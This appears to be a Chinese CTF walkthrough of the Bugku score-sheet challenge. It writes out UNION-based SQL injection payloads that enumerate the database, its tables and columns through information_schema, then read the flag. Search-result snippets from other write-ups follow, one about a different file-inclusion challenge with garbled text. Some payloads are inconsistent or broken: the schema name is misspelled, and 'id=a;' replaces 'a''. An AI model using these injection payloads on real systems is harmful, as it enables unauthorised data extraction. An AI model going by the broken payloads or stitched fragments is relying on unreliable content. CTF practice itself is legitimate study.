典型的sql聯合注入,用bp進行爆破。
step1:
聯合注入要求查詢列數相同,姓名、語數外一共四個資料,因此select 1,2,3,4
令id=a』是為了使前乙個查詢無效而回顯第二個查詢(也可以使用其他字元,只要保證union前的查詢無效即可)
id=a' union select 1,2,3,4#
step2:查詢資料庫名id=a' union select 1,2,3,database()#
即得資料庫名 skctf_flag
step3: 查詢表名
id=a' union select 1,2,3,concat(table_name) from information_schema.tables where table_schema='skcf_flag'#
#information_schema.tables 用於查詢表的資訊
#table_schema='skcf_flag' 指定要查詢的表名
得到表名為fl4g
step4 :查詢列名
id=a; union select 1,2,3,concat(column_name) from information_schema.columns where table_name='fl4g'
得到列名為skctf_flag
step5 :得flag
id=a; union select 1,2,3,skctf_flag from fl4g
Bugku 成績單 有感
題目位址 因為個人是個小白,看到題目毫無頭緒。在網上搜到wp,參考著得以理解。這個題目需要手動爆破資料庫的 庫名 表名 列名 內容。庫名 用資料庫聯合查詢語句 id 1 union select 1,2,3,database 得到資料庫名字skctf flag 表名 id 1 union selec...
bugku 成績單詳解
bugku 成績單詳解 首先開啟查詢成績的頁面 當你這樣去試了之後,就會發現當輸入id 1,2,3,的時候分別有三個孩子的成績,但是當id 4的時候,成績單裡面的成績又為空了。因此我們可以猜測資料庫裡面一共是有四列的 然後在此處利用內建函式database 爆破獲取資料庫的名字。此處可以看出資料庫的...
BUGKU 本地包含 成績單)
在網頁中新建標籤頁開啟鏈結後出現以下一些php 下面解析這段 r eq uest 這個變數 和 request這個變數和 r eque st這個 變數和 get post一樣,都屬於超級全域性變數,執行時修改後者不會影響前者,修改後者不會影響前者。在這裡可以以get post cookies等方式把...